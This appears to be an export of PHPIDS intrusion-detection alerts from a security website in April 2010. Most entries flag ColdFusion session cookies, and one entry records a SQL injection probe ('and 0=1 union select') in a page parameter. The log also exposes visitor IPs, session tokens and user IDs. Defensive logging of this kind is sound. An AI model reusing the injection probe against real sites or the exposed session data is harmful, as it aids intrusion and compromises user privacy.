| ID: | 122863 | | Name: | REQUEST.CFCLIENT_MOTNES | | Value: | userrecid=0#loggedin=false# | | Page: | /i.php?page=videos/advanced-data-recovery-forensic-scott-moulton | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:10 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 122864 | | Name: | REQUEST.CFGLOBALS | | Value: | urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606# | | Page: | /i.php?page=videos/advanced-data-recovery-forensic-scott-moulton | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:10 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: 3.49 Ratio: 3.125 Converted: ((((+::
|
| ID: | 122865 | | Name: | REQUEST.UserAuthentication | | Value: | authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US | | Page: | /i.php?page=videos/advanced-data-recovery-forensic-scott-moulton | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:10 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
|
| ID: | 122866 | | Name: | COOKIE.CFCLIENT_MOTNES | | Value: | userrecid=0#loggedin=false# | | Page: | /i.php?page=videos/advanced-data-recovery-forensic-scott-moulton | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:10 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 122867 | | Name: | COOKIE.CFGLOBALS | | Value: | urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606# | | Page: | /i.php?page=videos/advanced-data-recovery-forensic-scott-moulton | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:10 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: 3.49 Ratio: 3.125 Converted: ((((+::
|
| ID: | 122868 | | Name: | COOKIE.UserAuthentication | | Value: | authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US | | Page: | /i.php?page=videos/advanced-data-recovery-forensic-scott-moulton | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:10 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
|
| ID: | 122857 | | Name: | REQUEST.CFCLIENT_MOTNES | | Value: | userrecid=0#loggedin=false# | | Page: | /i.php?page=videos/pn12/scott-moulton-at-least-ten-things-you-didnt-know-about-your-hard-drive | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:06 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 122858 | | Name: | REQUEST.CFGLOBALS | | Value: | urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606# | | Page: | /i.php?page=videos/pn12/scott-moulton-at-least-ten-things-you-didnt-know-about-your-hard-drive | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:06 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: 3.49 Ratio: 3.125 Converted: ((((+::
|
| ID: | 122859 | | Name: | REQUEST.UserAuthentication | | Value: | authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US | | Page: | /i.php?page=videos/pn12/scott-moulton-at-least-ten-things-you-didnt-know-about-your-hard-drive | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:06 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
|
| ID: | 122860 | | Name: | COOKIE.CFCLIENT_MOTNES | | Value: | userrecid=0#loggedin=false# | | Page: | /i.php?page=videos/pn12/scott-moulton-at-least-ten-things-you-didnt-know-about-your-hard-drive | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:06 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 122861 | | Name: | COOKIE.CFGLOBALS | | Value: | urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606# | | Page: | /i.php?page=videos/pn12/scott-moulton-at-least-ten-things-you-didnt-know-about-your-hard-drive | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:06 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: 3.49 Ratio: 3.125 Converted: ((((+::
|
| ID: | 122862 | | Name: | COOKIE.UserAuthentication | | Value: | authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US | | Page: | /i.php?page=videos/pn12/scott-moulton-at-least-ten-things-you-didnt-know-about-your-hard-drive | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:06 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
|
| ID: | 122851 | | Name: | REQUEST.CFCLIENT_MOTNES | | Value: | userrecid=0#loggedin=false# | | Page: | /i.php?page=campuses-that-use-irongeek-for-teaching-infosec-in-higher-education | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:01 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 122852 | | Name: | REQUEST.CFGLOBALS | | Value: | urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606# | | Page: | /i.php?page=campuses-that-use-irongeek-for-teaching-infosec-in-higher-education | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:01 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: 3.49 Ratio: 3.125 Converted: ((((+::
|
| ID: | 122853 | | Name: | REQUEST.UserAuthentication | | Value: | authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US | | Page: | /i.php?page=campuses-that-use-irongeek-for-teaching-infosec-in-higher-education | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:01 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
|
| ID: | 122854 | | Name: | COOKIE.CFCLIENT_MOTNES | | Value: | userrecid=0#loggedin=false# | | Page: | /i.php?page=campuses-that-use-irongeek-for-teaching-infosec-in-higher-education | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:01 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 122855 | | Name: | COOKIE.CFGLOBALS | | Value: | urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606# | | Page: | /i.php?page=campuses-that-use-irongeek-for-teaching-infosec-in-higher-education | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:01 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: 3.49 Ratio: 3.125 Converted: ((((+::
|
| ID: | 122856 | | Name: | COOKIE.UserAuthentication | | Value: | authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US | | Page: | /i.php?page=campuses-that-use-irongeek-for-teaching-infosec-in-higher-education | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:52:01 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
|
| ID: | 122845 | | Name: | REQUEST.CFCLIENT_MOTNES | | Value: | userrecid=0#loggedin=false# | | Page: | /i.php?page=hire-adrian-for-security-or-tech-work-in-louisville-or-southern-indiana-kentuckiana | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:51:57 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 122846 | | Name: | REQUEST.CFGLOBALS | | Value: | urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606# | | Page: | /i.php?page=hire-adrian-for-security-or-tech-work-in-louisville-or-southern-indiana-kentuckiana | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:51:57 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: 3.49 Ratio: 3.125 Converted: ((((+::
|
| ID: | 122847 | | Name: | REQUEST.UserAuthentication | | Value: | authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US | | Page: | /i.php?page=hire-adrian-for-security-or-tech-work-in-louisville-or-southern-indiana-kentuckiana | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:51:57 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
|
| ID: | 122848 | | Name: | COOKIE.CFCLIENT_MOTNES | | Value: | userrecid=0#loggedin=false# | | Page: | /i.php?page=hire-adrian-for-security-or-tech-work-in-louisville-or-southern-indiana-kentuckiana | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:51:57 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 122849 | | Name: | COOKIE.CFGLOBALS | | Value: | urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606# | | Page: | /i.php?page=hire-adrian-for-security-or-tech-work-in-louisville-or-southern-indiana-kentuckiana | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:51:57 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: 3.49 Ratio: 3.125 Converted: ((((+::
|
| ID: | 122850 | | Name: | COOKIE.UserAuthentication | | Value: | authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US | | Page: | /i.php?page=hire-adrian-for-security-or-tech-work-in-louisville-or-southern-indiana-kentuckiana | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:51:57 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
|
| ID: | 122839 | | Name: | REQUEST.CFCLIENT_MOTNES | | Value: | userrecid=0#loggedin=false# | | Page: | /i.php?page=security/tracking-users-malware-and-data-leaks-via-the-usb-serial-numbers-on-flash-drives-smart-phones-and-mp3-players | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:51:53 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 122840 | | Name: | REQUEST.CFGLOBALS | | Value: | urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606# | | Page: | /i.php?page=security/tracking-users-malware-and-data-leaks-via-the-usb-serial-numbers-on-flash-drives-smart-phones-and-mp3-players | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:51:53 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: 3.49 Ratio: 3.125 Converted: ((((+::
|
| ID: | 122841 | | Name: | REQUEST.UserAuthentication | | Value: | authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US | | Page: | /i.php?page=security/tracking-users-malware-and-data-leaks-via-the-usb-serial-numbers-on-flash-drives-smart-phones-and-mp3-players | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:51:53 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
|
| ID: | 122842 | | Name: | COOKIE.CFCLIENT_MOTNES | | Value: | userrecid=0#loggedin=false# | | Page: | /i.php?page=security/tracking-users-malware-and-data-leaks-via-the-usb-serial-numbers-on-flash-drives-smart-phones-and-mp3-players | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:51:53 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 122843 | | Name: | COOKIE.CFGLOBALS | | Value: | urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606# | | Page: | /i.php?page=security/tracking-users-malware-and-data-leaks-via-the-usb-serial-numbers-on-flash-drives-smart-phones-and-mp3-players | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:51:53 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: 3.49 Ratio: 3.125 Converted: ((((+::
|
| ID: | 122844 | | Name: | COOKIE.UserAuthentication | | Value: | authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US | | Page: | /i.php?page=security/tracking-users-malware-and-data-leaks-via-the-usb-serial-numbers-on-flash-drives-smart-phones-and-mp3-players | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:51:53 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
|
| ID: | 122833 | | Name: | REQUEST.CFCLIENT_MOTNES | | Value: | userrecid=0#loggedin=false# | | Page: | / | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:51:49 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 122834 | | Name: | REQUEST.CFGLOBALS | | Value: | urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606# | | Page: | / | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:51:49 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: 3.49 Ratio: 3.125 Converted: ((((+::
|
| ID: | 122835 | | Name: | REQUEST.UserAuthentication | | Value: | authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US | | Page: | / | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:51:49 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
|
| ID: | 122836 | | Name: | COOKIE.CFCLIENT_MOTNES | | Value: | userrecid=0#loggedin=false# | | Page: | / | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:51:49 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 122837 | | Name: | COOKIE.CFGLOBALS | | Value: | urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606# | | Page: | / | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:51:49 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: 3.49 Ratio: 3.125 Converted: ((((+::
|
| ID: | 122838 | | Name: | COOKIE.UserAuthentication | | Value: | authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US | | Page: | / | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:51:49 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
|
| ID: | 122827 | | Name: | REQUEST.CFCLIENT_MOTNES | | Value: | userrecid=0#loggedin=false# | | Page: | / | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:51:45 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 122828 | | Name: | REQUEST.CFGLOBALS | | Value: | urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606# | | Page: | / | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:51:45 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: 3.49 Ratio: 3.125 Converted: ((((+::
|
| ID: | 122829 | | Name: | REQUEST.UserAuthentication | | Value: | authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US | | Page: | / | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:51:45 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
|
| ID: | 122830 | | Name: | COOKIE.CFCLIENT_MOTNES | | Value: | userrecid=0#loggedin=false# | | Page: | / | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:51:45 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
|
| ID: | 122831 | | Name: | COOKIE.CFGLOBALS | | Value: | urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606# | | Page: | / | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:51:45 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: 3.49 Ratio: 3.125 Converted: ((((+::
|
| ID: | 122832 | | Name: | COOKIE.UserAuthentication | | Value: | authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US | | Page: | / | | IP: | 65.200.90.169 | | Impact: | 90 | | Created: | 2010-04-29 03:51:45 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
|
| ID: | 122825 | | Name: | REQUEST.page | | Value: | security/thumbscrew-software-<span style='background-color:yellow'>usb</span>-write-blocker | | Page: | /i.php?page=security/thumbscrew-software-%3Cspan%20style='background-color:yellow'%3Eusb%3C/span%3E-write-blocker | | IP: | 66.249.67.227 | | Impact: | 42 | | Created: | 2010-04-29 03:40:25 | | Details: | Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1 Description: finds malicious attribute injection attempts | Tags: xss, csrf | ID: 69 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
|
| ID: | 122826 | | Name: | GET.page | | Value: | security/thumbscrew-software-<span style='background-color:yellow'>usb</span>-write-blocker | | Page: | /i.php?page=security/thumbscrew-software-%3Cspan%20style='background-color:yellow'%3Eusb%3C/span%3E-write-blocker | | IP: | 66.249.67.227 | | Impact: | 42 | | Created: | 2010-04-29 03:40:25 | | Details: | Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1 Description: finds malicious attribute injection attempts | Tags: xss, csrf | ID: 69 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
|
| ID: | 122823 | | Name: | REQUEST.page | | Value: | backtrack-3 and 0=1 union select -man/ike-scan | | Page: | /i.php?page=backtrack-3+and+0=1+union+select+-man/ike-scan | | IP: | 58.187.67.100 | | Impact: | 20 | | Created: | 2010-04-29 02:38:50 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55
|
| ID: | 122824 | | Name: | GET.page | | Value: | backtrack-3 and 0=1 union select -man/ike-scan | | Page: | /i.php?page=backtrack-3+and+0=1+union+select+-man/ike-scan | | IP: | 58.187.67.100 | | Impact: | 20 | | Created: | 2010-04-29 02:38:50 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55
|
